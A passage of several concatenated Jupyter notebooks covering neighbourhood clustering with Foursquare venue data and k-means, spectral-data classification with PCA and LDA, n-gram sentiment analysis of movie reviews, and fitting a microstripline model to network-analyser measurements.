zip(kut_neig['Latitude'], kut_neig['Longitude'], kut_neig['Borough'], kut_neig['Neighborhood']): label = '{}, {}'.format(neighborhood, borough) label = folium.Popup(label, parse_html=True) folium.CircleMarker( [lat, lng], radius=5, popup=label, color='blue', fill=True, fill_color='#3186cc', fill_opacity=0.7, parse_html=False).add_to(map_lon) map_lon # + [markdown] id="OZlRRX99FD61" colab_type="text" # ### Modelling <a name="modelling"></a> # # - Finding all the venues within a 500 meter radius of each neighborhood. # - Perform one hot ecoding on the venues data. # - Grouping the venues by the neighborhood and calculating their mean. # - Performing a K-means clustering (Defining K = 5) # + [markdown] id="2EL1N5YFFD63" colab_type="text" # #### Create a function to extract the venues from each Neighborhood # + id="r9nV4H9dFD69" colab_type="code" colab={} def getNearbyVenues(names, latitudes, longitudes, radius=500): venues_list=[] for name, lat, lng in zip(names, latitudes, longitudes): print(name) # create the API request URL url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format( CLIENT_ID, CLIENT_SECRET, VERSION, lat, lng, radius, LIMIT) # make the GET request results = requests.get(url).json()["response"]['groups'][0]['items'] # return only relevant information for each nearby venue venues_list.append([( name, lat, lng, v['venue']['name'], v['venue']['location']['lat'], v['venue']['location']['lng'], v['venue']['categories'][0]['name']) for v in results]) nearby_venues = pd.DataFrame([item for venue_list in venues_list for item in venue_list]) nearby_venues.columns = ['Neighborhood', 'Neighborhood Latitude', 'Neighborhood Longitude', 'Venue', 'Venue Latitude', 'Venue Longitude', 'Venue Category'] return(nearby_venues) # + id="ALhpA1iXFD7A" colab_type="code" colab={} outputId="46c109fc-49b6-4afa-9b61-b605b94d0eab" kut_venues = getNearbyVenues(names=kut_neig['Neighborhood'], latitudes=kut_neig['Latitude'], longitudes=kut_neig['Longitude'] ) # + id="absH7tc6FD7D" colab_type="code" colab={} outputId="a584fae3-7cb3-4fee-9ac0-0f52f57d33e1" print(kut_venues.shape) kut_venues.head() # + id="W9AO70n2FD7H" colab_type="code" colab={} outputId="42213421-1fe4-4ae1-dd2f-92c67e248395" kut_venues.groupby('Neighborhood').count() # + id="CXXBNrrUFD7L" colab_type="code" colab={} outputId="ae700536-1588-4946-fc69-b039e66bcf19" print('There are {} uniques categories.'.format(len(kut_venues['Venue Category'].unique()))) # + [markdown] id="2BP6r1FfFD7N" colab_type="text" # #### One hot encoding # # URL: https://hackernoon.com/what-is-one-hot-encoding-why-and-when-do-you-have-to-use-it-e3c6186d008f # + id="TvFzmW9UFD7P" colab_type="code" colab={} outputId="4cc2f540-d416-48c4-d1d3-3a9425b0e75f" # one hot encoding kut_onehot = pd.get_dummies(kut_venues[['Venue Category']], prefix="", prefix_sep="") # add neighborhood column back to dataframe kut_onehot['Neighborhood'] = kut_venues['Neighborhood'] # move neighborhood column to the first column fixed_columns = [kut_onehot.columns[-1]] + list(kut_onehot.columns[:-1]) kut_onehot = kut_onehot[fixed_columns] kut_onehot.head() # + [markdown] id="OHbjppJeFD7R" colab_type="text" # #### Grouping rows by neighborhood and by taking the mean of the frequency of occurrence of each category # + id="8I7kUNhJFD7S" colab_type="code" colab={} outputId="a30b0bd7-6a89-4746-dcc2-8e341ff98240" kut_grouped = kut_onehot.groupby('Neighborhood').mean().reset_index() kut_grouped # + id="B9XkP3SnFD7Z" colab_type="code" colab={} outputId="360cb404-6278-418b-ea12-5a9cec45c41f" kut_grouped.shape # + id="dQ9lkZKNFD7b" colab_type="code" colab={} outputId="2fdf6575-1022-4641-c127-9016a19d4b9d" num_top_venues = 5 for hood in kut_grouped['Neighborhood']: print("----"+hood+"----") temp = kut_grouped[kut_grouped['Neighborhood'] == hood].T.reset_index() temp.columns = ['venue','freq'] temp = temp.iloc[1:] temp['freq'] = temp['freq'].astype(float) temp = temp.round({'freq': 2}) print(temp.sort_values('freq', ascending=False).reset_index(drop=True).head(num_top_venues)) print('\n') # + [markdown] id="dnLQtFI5FD7d" colab_type="text" # #### Create a data frame of the venues # Function to sort the venues in descending order. # + id="tCoRlWtAFD7d" colab_type="code" colab={} def return_most_common_venues(row, num_top_venues): row_categories = row.iloc[1:] row_categories_sorted = row_categories.sort_values(ascending=False) return row_categories_sorted.index.values[0:num_top_venues] # + [markdown] id="mNv7si0IFD7n" colab_type="text" # Create the new dataframe and display the top 10 venues for each neighborhood # + id="PDJPkh7lFD7o" colab_type="code" colab={} outputId="023ac7a1-8fa1-45db-8cc3-c2ea40ed4ffd" num_top_venues = 10 indicators = ['st', 'nd', 'rd'] # create columns according to number of top venues columns = ['Neighborhood'] for ind in np.arange(num_top_venues): try: columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind])) except: columns.append('{}th Most Common Venue'.format(ind+1)) # create a new dataframe neighborhoods_venues_sorted = pd.DataFrame(columns=columns) neighborhoods_venues_sorted['Neighborhood'] = kut_grouped['Neighborhood'] for ind in np.arange(kut_grouped.shape[0]): neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(kut_grouped.iloc[ind, :], num_top_venues) neighborhoods_venues_sorted.head() # + [markdown] id="nueyvUIzFD7s" colab_type="text" # ### Clustering similar neighborhoods together using k - means clustering # + id="EPB2QbhuFD7t" colab_type="code" colab={} outputId="be44e56e-6464-4809-8ad3-c9d870cc4816" # import k-means from clustering stage from sklearn.cluster import KMeans # set number of clusters kclusters = 5 kut_grouped_clustering = kut_grouped.drop('Neighborhood', 1) # run k-means clustering kmeans = KMeans(n_clusters=kclusters, random_state=0).fit(kut_grouped_clustering) # check cluster labels generated for each row in the dataframe kmeans.labels_[0:10] # + id="TPrlNa21FD7w" colab_type="code" colab={} outputId="fde804aa-5722-41af-a683-7bb7bb0c7c3e" # add clustering labels neighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_) kut_merged = kut_neig # merge toronto_grouped with toronto_data to add latitude/longitude for each neighborhood kut_merged = kut_merged.join(neighborhoods_venues_sorted.set_index('Neighborhood'), on='Neighborhood') kut_merged.head() # check the last columns! # + id="N8ti5TSPFD72" colab_type="code" colab={} outputId="f7c28a2d-7373-4384-a695-74faf7ce982b" kut_merged.info() # + id="XaF6ty0mFD8B" colab_type="code" colab={} # Dropping the row with the NaN value kut_merged.dropna(inplace = True) # + id="g7tsAyU6FD8l" colab_type="code" colab={} outputId="316ce7a8-21fc-4c05-8ead-77441e755302" kut_merged.shape # + id="IWN3sXmHFD8x" colab_type="code" colab={} kut_merged['Cluster Labels'] = kut_merged['Cluster Labels'].astype(int) # + id="3N-qbU1sFD9B" colab_type="code" colab={} outputId="90b3183d-fb4f-4b2c-b2fc-41369f84372d" kut_merged.info() # + [markdown] id="E1qLeUSZFD9H" colab_type="text" # ### Visualize the clusters # + id="9JoTr2AuFD9I" colab_type="code" colab={} outputId="1b2d818b-5ec4-4f9c-e21a-0ebb1852155e" # create map map_clusters = folium.Map(location=[latitude, longitude], zoom_start=11.5) # set color scheme for the clusters x = np.arange(kclusters) ys = [i + x + (i*x)**2 for i in range(kclusters)] colors_array = cm.rainbow(np.linspace(0, 1, len(ys))) rainbow = [colors.rgb2hex(i) for i in colors_array] # add markers to the map markers_colors = [] for lat, lon, poi, cluster in zip(kut_merged['Latitude'], kut_merged['Longitude'], kut_merged['Neighborhood'], kut_merged['Cluster Labels']): label = folium.Popup(str(poi) + ' Cluster ' + str(cluster), parse_html=True) folium.CircleMarker( [lat, lon], radius=8, popup=label, color=rainbow[cluster-1], fill=True, fill_color=rainbow[cluster-1], fill_opacity=0.5).add_to(map_clusters) map_clusters # + [markdown] id="FUqUtNZtFD9Z" colab_type="text" # Each cluster is color coded for the ease of presentation, we can see that majority of the neighborhood falls in the red cluster which is the first cluster. Three neighborhoods have their own cluster (Blue, Purple and Yellow), these are clusters two three and five. The green cluster consists of two neighborhoods which is the 4th cluster. # + [markdown] id="snuhE9dvFD9b" colab_type="text" # ## Analysis <a name="analysis"></a> # # Analyse each of the clusters to identify the characteristics of each cluster and the neighborhoods in them. # + [markdown] id="H-e0R8QDFD9h" colab_type="text" # #### Examine the first cluster # + id="qaAONqWAFD9j" colab_type="code" colab={} outputId="ff9b7dd9-ea48-4fce-fa5d-d01fa5ecb6f4" kut_merged[kut_merged['Cluster Labels'] == 0] # + [markdown] id="d4A1A_SxFD9n" colab_type="text" # The cluster one is the biggest cluster with 9 of the 15 neighborhoods in the borough Kingston upon Thames. Upon closely examining these neighborhoods we can see that the most common venues in these neighborhoods are Restaurants, Pubs, Cafe, Supermarkets, and stores. # + [markdown] id="bbM60gT4FD9t" colab_type="text" # #### Examine the second cluster # + id="7yp3ftpVFD9z" colab_type="code" colab={} outputId="88cb2b0e-571d-4453-b73e-55f849320cae" kut_merged[kut_merged['Cluster Labels'] == 1] # + [markdown] id="KctfmlPgFD-D" colab_type="text" # The second cluster has one neighborhood which consists of Venues such as Restaurants, Golf courses, and wine shops. # + [markdown] id="2AvZJaHMFD-E" colab_type="text" # #### Examine the third cluster # + id="7wdS-APvFD-F" colab_type="code" colab={} outputId="14c1191d-e16d-4360-87a0-98a9b9cdaba8" kut_merged[kut_merged['Cluster Labels'] == 2] # + [markdown] id="-Sx1bWXyFD-K" colab_type="text" # The third cluster has one neighborhood which consists of Venues such as Train stations, Restaurants, and Furniture shops. # + [markdown] id="9T6UF5_aFD-L" colab_type="text" # #### Examine the forth cluster # + id="IcKQMawRFD-N" colab_type="code" colab={} outputId="b2235331-63bc-41b9-bb62-a7a44e5e907a" kut_merged[kut_merged['Cluster Labels'] == 3] # + [markdown] id="0PqciB59FD-U" colab_type="text" # The fourth cluster has two neighborhoods in it, these neighborhoods have common venues such as Parks, Gym/Fitness centers, Bus Stops, Restaurants, Electronics Stores and Soccer fields etc. # # + [markdown] id="qRL9BxGJFD-V" colab_type="text" # #### Examine the fifth cluster # + id="hjSvT36NFD-W" colab_type="code" colab={} outputId="17fa48fe-cf98-41e7-a12d-e11779935548" kut_merged[kut_merged['Cluster Labels'] == 4] # + [markdown] id="TSTfJJrAFD-Z" colab_type="text" # The fifth cluster has one neighborhood which consists of Venues such as Grocery shops, Bars, Restaurants, Furniture shops, and Department stores. # + [markdown] id="rO-WgERGFD-Z" colab_type="text" # ## Results and Discussion <a name="results"></a> # + [markdown] id="zeZiL3j_FD-a" colab_type="text" # The aim of this project is to help people who want to relocate to the safest borough in London, expats can chose the neighborhoods to which they want to relocate based on the most common venues in it. For example if a person is looking for a neighborhood with good connectivity and public transportation we can see that Clusters 3 and 4 have Train stations and Bus stops as the most common venues. If a person is looking for a neighborhood with stores and restaurants in a close proximity then the neighborhoods in the first cluster is suitable. For a family I feel that the neighborhoods in Cluster 4 are more suitable dues to the common venues in that cluster, these neighborhoods have common venues such as Parks, Gym/Fitness centers, Bus Stops, Restaurants, Electronics Stores and Soccer fields which is ideal for a family. # + [markdown] id="wZVrTi-bFD-a" colab_type="text" # ## Conclusion <a name="conclusion"></a> # + [markdown] id="TPi_fBxFFD-b" colab_type="text" # This project helps a person get a better understanding of the neighborhoods with respect to the most common venues in that neighborhood. It is always helpful to make use of technology to stay one step ahead i.e. finding out more about places before moving into a neighborhood. We have just taken safety as a primary concern to shortlist the borough of London. The future of this project includes taking other factors such as cost of living in the areas into consideration to shortlist the borough based on safety and a predefined budget.
Coursera_capstone/all_assignments/Capstone_Project_The_Battle_of_the_Neighborhoods_London_Neighborhood_Clustering.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.8.5 64-bit (''base'': conda)' # language: python # name: python3 # --- import pandas as pd import os import numpy as np import matplotlib.pyplot as plt import seaborn as sns folder = 'data' df = pd.read_excel(os.path.join(folder, '20211128 - Full DART Data (Model & Test).xlsx'), header=2) df.head() labeled_df = df[df['Sample Types'] == 'Model'] recol = [(float('.'.join(col.split('.')[:2])) if isinstance(col, str) else col) for col in df.columns[4:]] unique_classes = labeled_df['Class'].unique() labeled_df['Class'].value_counts() # + def plot(df, unique_classes): for label in unique_classes: df = labeled_df[labeled_df['Class'] == label] for ind, row in df.iterrows(): plt.plot(recol, row.iloc[4:]) plt.title(row["Sample"]) plt.savefig(os.path.join("figures_real_data", f"sample_class_{label}_sample_{row['Sample']}.png")) plt.close() return # plot(df, unique_classes) # + savefolder = 'figures_real_data' def extractor(labeled_df, unique_classes, recol, gt=25): #for label in unique_classes: label = unique_classes[0] df = labeled_df[labeled_df['Class'] == label] data = df[df.columns[4:]].values data[data<gt] = 0 active_peaks_locs = (data > gt).any(axis=0) active_peaks = data[:, active_peaks_locs] active_recol = [r for r,b in zip(recol, active_peaks_locs) if b] for i in range(active_peaks.shape[1]): plt.plot(active_peaks[:,i]) plt.title(f'{label} - {active_recol[i]}') plt.savefig(os.path.join(savefolder, f'peak_activation_class_{label}_peak_{i}.png')) plt.close() extractor(labeled_df, unique_classes, recol) # - # + from sklearn.cluster import KMeans import matplotlib.pyplot as plt from sklearn.decomposition import PCA import matplotlib from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.metrics import classification_report, confusion_matrix from sklearn.model_selection import train_test_split gt=25 big_df = labeled_df.copy() df = big_df[big_df['Class'].isin(unique_classes)] # [:10] print(df.shape, labeled_df.shape) data = df[df.columns[4:]].values data[data<gt] = 0 active_peaks_locs = (data > gt).any(axis=0) active_peaks = data[:, active_peaks_locs] inertias = [] ks = range(1,36,2) for k in ks: km = KMeans(n_clusters=k) km.fit(active_peaks) inertias.append(km.inertia_) plt.plot(ks, inertias) plt.show() #colors = ['red', 'green', 'blue', 'orange', 'brown'] df_unique_classes = df['Class'].unique() cmap = matplotlib.cm.get_cmap('Spectral') colors = [cmap(i) for i in np.linspace(0,1,len(df_unique_classes))] df['class_color'] = df['Class'] df['class_color'] = df['class_color'].map(dict(zip(df_unique_classes, colors[:len(df_unique_classes)]))) fig = plt.figure() ax = fig.add_subplot(projection='3d') pca = PCA(n_components=3) pca_X = pca.fit_transform(active_peaks) for label in df_unique_classes: mask = df['Class'] == label sub = df.loc[mask] ax.scatter(pca_X[mask,0], pca_X[mask,1], pca_X[mask,2], c=sub['class_color'], label=label) plt.legend() plt.show() train_df, test_df, Xtrain, Xtest = train_test_split(df, active_peaks, train_size=0.7, stratify=df['Class']) ytrain = train_df['Class'].values ytest = test_df['Class'].values lda = LinearDiscriminantAnalysis() lda.fit(Xtrain, ytrain) ypred = lda.predict(Xtest) print(classification_report(ytest, ypred)) print(confusion_matrix(ytest, ypred)) # -
extractor_real_to_sim.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # N-Gram models # > Learn about n-gram modeling and use it to perform sentiment analysis on movie reviews. This is the Summary of lecture "Feature Engineering for NLP in Python", via datacamp. # # - toc: true # - badges: true # - comments: true # - author: <NAME> # - categories: [Python, Datacamp, Natural_Language_Processing] # - image: # + import pandas as pd import numpy as np import matplotlib.pyplot as plt import spacy plt.rcParams['figure.figsize'] = (8, 8) # - # ## Building a bag of words model # - Bag of words model # - Extract word tokens # - Compute frequency of word tokens # - Construct a word vector out of these frequencies and vocabulary of corpus # ### BoW model for movie taglines # In this exercise, you have been provided with a `corpus` of more than 7000 movie tag lines. Your job is to generate the bag of words representation `bow_matrix` for these taglines. For this exercise, we will ignore the text preprocessing step and generate `bow_matrix` directly. movies = pd.read_csv('./dataset/movie_overviews.csv').dropna() movies['tagline'] = movies['tagline'].str.lower() movies.head() corpus = movies['tagline'] # + from sklearn.feature_extraction.text import CountVectorizer # Create CountVectorizer object vectorizer = CountVectorizer() # Generate matrix of word vectors bow_matrix = vectorizer.fit_transform(corpus) # Print the shape of bow_matrix print(bow_matrix.shape) # - # You now know how to generate a bag of words representation for a given corpus of documents. Notice that the word vectors created have more than 6600 dimensions. However, most of these dimensions have a value of zero since most words do not occur in a particular tagline. # ### Analyzing dimensionality and preprocessing # In this exercise, you have been provided with a `lem_corpus` which contains the pre-processed versions of the movie taglines from the previous exercise. In other words, the taglines have been lowercased and lemmatized, and stopwords have been removed. # # Your job is to generate the bag of words representation `bow_lem_matrix` for these lemmatized taglines and compare its shape with that of `bow_matrix` obtained in the previous exercise. nlp = spacy.load('en_core_web_sm') stopwords = spacy.lang.en.stop_words.STOP_WORDS lem_corpus = corpus.apply(lambda row: ' '.join([t.lemma_ for t in nlp(row) if t.lemma_ not in stopwords and t.lemma_.isalpha()])) lem_corpus # + # Create CountVectorizer object vectorizer = CountVectorizer() # Generate of word vectors bow_lem_matrix = vectorizer.fit_transform(lem_corpus) # Print the shape of how_lem_matrix print(bow_lem_matrix.shape) # - # ### Mapping feature indices with feature names # n the lesson video, we had seen that `CountVectorizer` doesn't necessarily index the vocabulary in alphabetical order. In this exercise, we will learn to map each feature index to its corresponding feature name from the vocabulary. sentences = ['The lion is the king of the jungle', 'Lions have lifespans of a decade', 'The lion is an endangered species'] # + # Create CountVectorizer object vectorizer = CountVectorizer() # Generate matrix of word vectors bow_matrix = vectorizer.fit_transform(sentences) # Convert bow_matrix into a DataFrame bow_df = pd.DataFrame(bow_matrix.toarray()) # Map the column names to vocabulary bow_df.columns = vectorizer.get_feature_names() # Print bow_df bow_df # - # Observe that the column names refer to the token whose frequency is being recorded. Therefore, since the first column name is an, the first feature represents the number of times the word `'an'` occurs in a particular sentence. `get_feature_names()` essentially gives us a list which represents the mapping of the feature indices to the feature name in the vocabulary. # ## Building a BoW Naive Bayes classifier # - Steps # 1. Text preprocessing # 2. Building a bag-of-words model (or representation) # 3. Machine Learning # ### BoW vectors for movie reviews # n this exercise, you have been given two pandas Series, `X_train` and `X_test`, which consist of movie reviews. They represent the training and the test review data respectively. Your task is to preprocess the reviews and generate BoW vectors for these two sets using `CountVectorizer`. # # Once we have generated the BoW vector matrices `X_train_bow` and `X_test_bow`, we will be in a very good position to apply a machine learning model to it and conduct sentiment analysis. movie_reviews = pd.read_csv('./dataset/movie_reviews_clean.csv') movie_reviews.head() X = movie_reviews['review'] y = movie_reviews['sentiment'] # + from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25) # + # Create a CounterVectorizer object vectorizer = CountVectorizer(lowercase=True, stop_words='english') # fit and transform X_train X_train_bow = vectorizer.fit_transform(X_train) # Transform X_test X_test_bow = vectorizer.transform(X_test) # Print shape of X_train_bow and X_test_bow print(X_train_bow.shape) print(X_test_bow.shape) # - # You now have a good idea of preprocessing text and transforming them into their bag-of-words representation using `CountVectorizer`. In this exercise, you have set the lowercase argument to True. However, note that this is the default value of lowercase and passing it explicitly is not necessary. Also, note that both `X_train_bow` and `X_test_bow` have 7822 features. There were words present in `X_test` that were not in `X_train`. CountVectorizer chose to ignore them in order to ensure that the dimensions of both sets remain the same. # ### Predicting the sentiment of a movie review # n the previous exercise, you generated the bag-of-words representations for the training and test movie review data. In this exercise, we will use this model to train a Naive Bayes classifier that can detect the sentiment of a movie review and compute its accuracy. Note that since this is a binary classification problem, the model is only capable of classifying a review as either positive (1) or negative (0). It is incapable of detecting neutral reviews. # + from sklearn.naive_bayes import MultinomialNB # Create a MultinomialNB object clf = MultinomialNB() # Fit the classifier clf.fit(X_train_bow, y_train) # Measure the accuracy accuracy = clf.score(X_test_bow, y_test) print("The accuracy of the classifier on the test set is %.3f" % accuracy) # Predict the sentiment of a negative review review = 'The movie was terrible. The music was underwhelming and the acting mediocre.' prediction = clf.predict(vectorizer.transform([review]))[0] print("The sentiment predicted by the classifier is %i" % (prediction)) # - # You have successfully performed basic sentiment analysis. Note that the accuracy of the classifier is 80%. Considering the fact that it was trained on only 750 reviews, this is reasonably good performance. The classifier also correctly predicts the sentiment of a mini negative review which we passed into it. # ## Building n-gram models # - BoW shortcomings # - Example # - `The movie was good and not boring` -> positive # - `The movie was not good and boring` -> negative # - Exactly the same BoW representation! # - Context of the words is lost. # - Sentiment dependent on the position of `not` # - n-grams # - Contiguous sequence of n elements (or words) in a given document. # - Bi-grams / Tri-grams # - n-grams Shortcomings # - Increase number of dimension, occurs curse of dimensionality # - Higher order n-grams are rare # ### n-gram models for movie tag lines # In this exercise, we have been provided with a corpus of more than 9000 movie tag lines. Our job is to generate n-gram models up to n equal to 1, n equal to 2 and n equal to 3 for this data and discover the number of features for each model. # # We will then compare the number of features generated for each model. # + # Generate n-grams upto n=1 vectorizer_ng1 = CountVectorizer(ngram_range=(1, 1)) ng1 = vectorizer_ng1.fit_transform(corpus) # Generate n-grams upto n=2 vectorizer_ng2 = CountVectorizer(ngram_range=(1, 2)) ng2 = vectorizer_ng2.fit_transform(corpus) # Generate n-grams upto n=3 vectorizer_ng3 = CountVectorizer(ngram_range=(1, 3)) ng3 = vectorizer_ng3.fit_transform(corpus) # Print the number of features for each model print("ng1, ng2 and ng3 have %i, %i and %i features respectively" % (ng1.shape[1], ng2.shape[1], ng3.shape[1])) # - # You now know how to generate n-gram models containing higher order n-grams. Notice that `ng2` has over 37,000 features whereas `ng3` has over 76,000 features. This is much greater than the 6,000 dimensions obtained for `ng1`. As the n-gram range increases, so does the number of features, leading to increased computational costs and a problem known as the curse of dimensionality. # ### Higher order n-grams for sentiment analysis # Similar to a previous exercise, we are going to build a classifier that can detect if the review of a particular movie is positive or negative. However, this time, we will use n-grams up to n=2 for the task. ng_vectorizer = CountVectorizer(ngram_range=(1, 2)) X_train_ng = ng_vectorizer.fit_transform(X_train) X_test_ng = ng_vectorizer.transform(X_test) # + # Define an instance of MultinomialNB clf_ng = MultinomialNB() # Fit the classifier clf_ng.fit(X_train_ng, y_train) # Measure the accuracy accuracy = clf_ng.score(X_test_ng, y_test) print("The accuracy of the classifier on the test set is %.3f" % accuracy) # Predict the sentiment of a negative review review = 'The movie was not good. The plot had several holes and the acting lacked panache' prediction = clf_ng.predict(ng_vectorizer.transform([review]))[0] print("The sentiment predicted by the classifier is %i" % (prediction)) # - # Notice how this classifier performs slightly better than the BoW version. Also, it succeeds at correctly identifying the sentiment of the mini-review as negative. # ### Comparing performance of n-gram models # You now know how to conduct sentiment analysis by converting text into various n-gram representations and feeding them to a classifier. In this exercise, we will conduct sentiment analysis for the same movie reviews from before using two n-gram models: unigrams and n-grams upto n equal to 3. # # We will then compare the performance using three criteria: accuracy of the model on the test set, time taken to execute the program and the number of features created when generating the n-gram representation. # + import time start_time = time.time() # Splitting the data into training and test sets train_X, test_X, train_y, test_y = train_test_split(movie_reviews['review'], movie_reviews['sentiment'], test_size=0.5, random_state=42, stratify=movie_reviews['sentiment']) # Generateing ngrams vectorizer = CountVectorizer(ngram_range=(1,1)) train_X = vectorizer.fit_transform(train_X) test_X = vectorizer.transform(test_X) # Fit classifier clf = MultinomialNB() clf.fit(train_X, train_y) # Print the accuracy, time and number of dimensions print("The program took %.3f seconds to complete. The accuracy on the test set is %.2f. " % (time.time() - start_time, clf.score(test_X, test_y))) print("The ngram representation had %i features." % (train_X.shape[1])) # + start_time = time.time() # Splitting the data into training and test sets train_X, test_X, train_y, test_y = train_test_split(movie_reviews['review'], movie_reviews['sentiment'], test_size=0.5, random_state=42, stratify=movie_reviews['sentiment']) # Generateing ngrams vectorizer = CountVectorizer(ngram_range=(1,3)) train_X = vectorizer.fit_transform(train_X) test_X = vectorizer.transform(test_X) # Fit classifier clf = MultinomialNB() clf.fit(train_X, train_y) # Print the accuracy, time and number of dimensions print("The program took %.3f seconds to complete. The accuracy on the test set is %.2f. " % (time.time() - start_time, clf.score(test_X, test_y))) print("The ngram representation had %i features." % (train_X.shape[1])) # - # The program took around 0.2 seconds in the case of the unigram model and more than 10 times longer for the higher order n-gram model. The unigram model had over 12,000 features whereas the n-gram model for upto n=3 had over 178,000! Despite taking higher computation time and generating more features, the classifier only performs marginally better in the latter case, producing an accuracy of 77% in comparison to the 75% for the unigram model.
_notebooks/2020-07-17-03-N-Gram-models.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Correlating microstripline model to measurement # # ## Target # # The aim of this example is to correlate the microstripline model to the measurement over 4 frequency decades from 1MHz to 5GHz. # # ## Plan # # 1. Two different lengths of microstripline are measured; # 2. Multiline method is used to compute the frequency dependant relative permittivity and loss angle of the dielectric; # 3. Microstripline model is fitted to the computed parameters by optimization; # 4. Checking the results by embedding the connectors and comparison against measurement; # + # %load_ext autoreload # %autoreload 2 import skrf as rf import numpy as np from numpy import real, log10, sum, absolute, pi, sqrt import matplotlib.pyplot as plt from scipy.optimize import minimize, differential_evolution rf.stylely() # - # ## Measurement of two microstripline with different lenght # The measurement where performed the 21th March 2017 on a Anritsu MS46524B 20GHz Vector Network Analyser. The setup is a linear frequency sweep from 1MHz to 10GHz with 10'000 points. Output power is 0dBm, IF bandwidth is 1kHz and neither averaging nor smoothing are used. # # The frequency range of interest is limited from 1MHz to 5GHz, but the measurement are up to 10GHz. # # MSLxxx is a L long, W wide, T thick copper microstripline on a H height substrate with bottom ground plane. # # | Name | L (mm) | W (mm) | H (mm) | T (um) | Substrate | # | :--- | ---: | ---: | ---: | ---: | :--- | # | MSL100 | 100 | 3.00 | 1.55 | 50 | FR-4 | # | MSL200 | 200 | 3.00 | 1.55 | 50 | FR-4 | # # The milling of the artwork is performed mechanically with a lateral wall of 45°. A small top ground plane chunk connected by a vias array to bottom ground is provided to solder the connector top ground legs and provide some coplanar-like transition from coax to microstrip. # # The relative permittivity of the dielectric was assumed to be approximatively 4.5 for design purpose. # # ![MSL100 and MSL200 iillustaration, both are microstripline, MSL200 is twice the length of MSL100](MSL_CPWG_100_200.jpg "MSL100 and MSL200") # + # Load raw measurements MSL100_raw = rf.Network('MSL100.s2p') MSL200_raw = rf.Network('MSL200.s2p') # Keep only the data from 1MHz to 5GHz MSL100 = MSL100_raw['1-5000mhz'] MSL200 = MSL200_raw['1-5000mhz'] plt.figure() plt.title('Measured data') MSL100.plot_s_db() MSL200.plot_s_db() plt.show() # - # The measured data shows that the electrical length of MSL200 is approximatively twice the one of MSL100. The frequency spacing between Return Loss dips is aproximatively the half for MSL200 compared to MSL100. This is coherent with the physical dimensions if the small connector length is neglected. # # The MSL200 Insertion Loss is also about twice than MSL100, which is coherent as a longer path bring more attenuation. # # Return Loss under -20dB is usually considered to be fair for microstripline, it correspond to 1% of the power being reflected. # ## Dielectric effective relative permittivity extraction by multiline method # The phase of the measurements transmission parameter are subtracted. Because connectors are present on both DUTs, their lenght effect is canceled and the remaining phase difference is related to the difference of the DUTs length. # # Knowing the physical length $\Delta L$ and the phase $\Delta \phi$, the effective relative permittivity constant $\epsilon_{r,eff}$ can be computed from the relation # $$\left\{ \begin{array}{ll} # \lambda = \frac{c_0}{f \cdot \sqrt{\epsilon_{r,eff}}} \\ # \phi = \frac{2\pi L}{\lambda} # \end{array} \right. \implies # \epsilon_{r,eff} = \left( \frac{\Delta \phi \cdot c_0}{2 \pi f \cdot \Delta L} \right)^2 $$ # # In the same idea, the difference of Insertion Loss of the two DUT gives the Insertion Loss of the difference of the length and cancel connectors effects. # + c0 = 3e8 f = MSL100.f deltaL = 0.1 deltaPhi = np.unwrap(np.angle(MSL100.s[:,1,0])) - np.unwrap(np.angle(MSL200.s[:,1,0])) Er_eff = np.power(deltaPhi * c0 / (2 * np.pi * f * deltaL), 2) Loss_mea = 20 * log10(absolute(MSL200.s[:,1,0] / MSL100.s[:,1,0])) plt.figure() plt.suptitle('Effective relative permittivity and loss') plt.subplot(2,1,1) plt.plot(f * 1e-9, Er_eff) plt.ylabel('$\epsilon_{r,eff}$') plt.subplot(2,1,2) plt.plot(f * 1e-9, Loss_mea) plt.xlabel('Frequency (GHz)') plt.ylabel('Insertion Loss (dB)') plt.show() # - # The effective relative permittivity of the geometry shows a dispersion effect at low frequency which can be modelled by a wideband Debye model such as *Djordjevic/Svensson* implementation of skrf microstripline media. The value then increase slowly with frequency which correspond roughly to the *Kirschning and Jansen* dispersion model. # # The Insertion Loss seems proportionnal to frequency, which indicate a predominance of the dielectric losses. Conductor losses are related to the square-root of frequency. Radiation losses are neglected. # ## Fit microstripline model to the computed parameters by optimization # # ### Effective relative permittivity # Microstrip media model with the physical dimensions of the measured microstriplines is fitted to the computed $\epsilon_{r,eff}$ by optimization of $\epsilon_r$ and tand of the substrate at 1GHz. The dispersion model used to account for frequency variation of the parameters are *Djordjevic/Svensson* and *Kirschning and Jansen*. # + from skrf.media import MLine W = 3.00e-3 H = 1.51e-3 T = 50e-6 L = 0.1 Er0 = 4.5 tand0 = 0.02 f_epr_tand = 1e9 x0 = [Er0, tand0] def model(x, freq, Er_eff, L, W, H, T, f_epr_tand, Loss_mea): ep_r = x[0] tand = x[1] m = MLine(frequency=freq, z0=50, w=W, h=H, t=T, ep_r=ep_r, mu_r=1, rho=1.712e-8, tand=tand, rough=0.15e-6, f_low=1e3, f_high=1e12, f_epr_tand=f_epr_tand, diel='djordjevicsvensson', disp='kirschningjansen') DUT = m.line(L, 'm', embed=True, z0=m.Z0_f) Loss_mod = 20 * log10(absolute(DUT.s[:,1,0])) return sum((real(m.ep_reff_f) - Er_eff)**2) + 0.01*sum((Loss_mod - Loss_mea)**2) res = minimize(model, x0, args=(MSL100.frequency, Er_eff, L, W, H, T, f_epr_tand, Loss_mea), bounds=[(4.2, 4.7), (0.001, 0.1)]) Er = res.x[0] tand = res.x[1] print('Er={:.3f}, tand={:.4f} at {:.1f} GHz.'.format(Er, tand, f_epr_tand * 1e-9)) # - # As a sanity check, the model data are compared with the computed parameters # + m = MLine(frequency=MSL100.frequency, z0=50, w=W, h=H, t=T, ep_r=Er, mu_r=1, rho=1.712e-8, tand=tand, rough=0.15e-6, f_low=1e3, 